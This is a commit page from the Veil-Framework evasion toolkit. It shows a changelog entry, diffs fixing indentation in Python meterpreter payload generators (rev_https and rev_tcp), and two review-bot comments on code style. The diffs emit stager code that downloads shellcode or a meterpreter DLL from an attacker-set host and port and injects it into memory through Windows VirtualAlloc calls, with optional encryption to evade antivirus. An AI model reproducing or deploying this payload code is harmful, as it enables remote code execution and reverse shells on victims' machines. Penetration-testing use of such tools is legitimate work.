Merge pull request Veil-Framework#41 from Veil-Framework/fixhttps
Fix formatting issue along with bug in rev_https
ChrisTruncer authored Apr 4, 2017
2 parents 53a4fdb + edf9c40 commit a9bac7e
Showing 3 changed files with 11 additions and 7 deletions.
4 changes: 4 additions & 0 deletions CHANGELOG
@@ -1,3 +1,7 @@
[04.04.2017]
Released.: 3.0.1
Modified.: Python rev_https and rev_tcp modified to fix a small bug and formatting issue

[03.07.2017]
Released.: 3.0
Modified.: This is Veil 3.0's initial release (with minor bug patches post-release). Ideally everything is working well! All mods (hopefully) will be tracked in this file so you know of any changes.
10 changes: 5 additions & 5 deletions Tools/Evasion/payloads/python/meterpreter/rev_https.py
@@ -99,7 +99,7 @@ def generate(self):
payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n"
payload_code += '\t' * num_tabs_required + '\t' * num_tabs_required + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
payload_code += '\t' * num_tabs_required + '\t' + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\t%s = urllib.request.urlopen(%s)\n" %(tName, requestName)
payload_code += '\t' * num_tabs_required + "\t\ttry:\n"
@@ -112,7 +112,7 @@ def generate(self):
payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName, dataName)
payload_code += '\t' * num_tabs_required + "\tif %s != \"\":\n" %(dataName)
payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)

if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
@@ -132,9 +132,9 @@ def generate(self):
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'

# download the metpreter .dll and inject it
payload_code += "%s = ''\n" %(data2Name)
payload_code += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payload_code += "%s(%s)\n" %(injectMethodName, data2Name)
payload_code += '\t' * num_tabs_required + "%s = ''\n" %(data2Name)
payload_code += '\t' * num_tabs_required + "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payload_code += '\t' * num_tabs_required + "%s(%s)\n" %(injectMethodName, data2Name)

if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
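Review bot: The last hunk formats `self.required_options["LHOST"][0]` and `self.required_options["LPORT"][0]` straight into the generated source, the host between hand-written `\"` quotes and the port as a bare expression, and nothing visible in these hunks checks either value first. A host string containing a quote or backslash, or a non-numeric port, would yield output that fails to parse or that contains statements the operator did not intend; if validation happens elsewhere in the module, it is not shown here. Emitting the host with `%r` and the port with `%d` over `int(self.required_options["LPORT"][0])` keeps both as literals, i.e. the format string becomes `"%s = %s(%r, %d)\n"`. `generate()` starts and ends outside the visible hunks.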
4 changes: 2 additions & 2 deletions Tools/Evasion/payloads/python/meterpreter/rev_tcp.py
@@ -130,9 +130,9 @@ def generate(self):
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'

# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
payload_code += '\t' * num_tabs_required + "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName)
payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (injectMethodName, shellCodeName)

if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
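Review bot: Every emitted line in this hunk rebuilds its indentation by hand as `'\t' * num_tabs_required`, and the two corrected statements appear to have been wrong only because that prefix was left off. The rev_https.py hunks in this commit fix the same kind of slip, including what looks like a doubled prefix on the `urllib.request.Request` line. Binding the prefix once, `indent = '\t' * num_tabs_required`, and writing `payload_code += indent + "%s(%s)\n" % (injectMethodName, shellCodeName)` would make a missing or repeated prefix easy to see in review. A one-line comment above the two trailing statements, saying they must be emitted at the same depth as the rest of the generated code, would record why the prefix is required. `generate()` begins and ends outside the hunk, so where `num_tabs_required` is set is not visible here.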
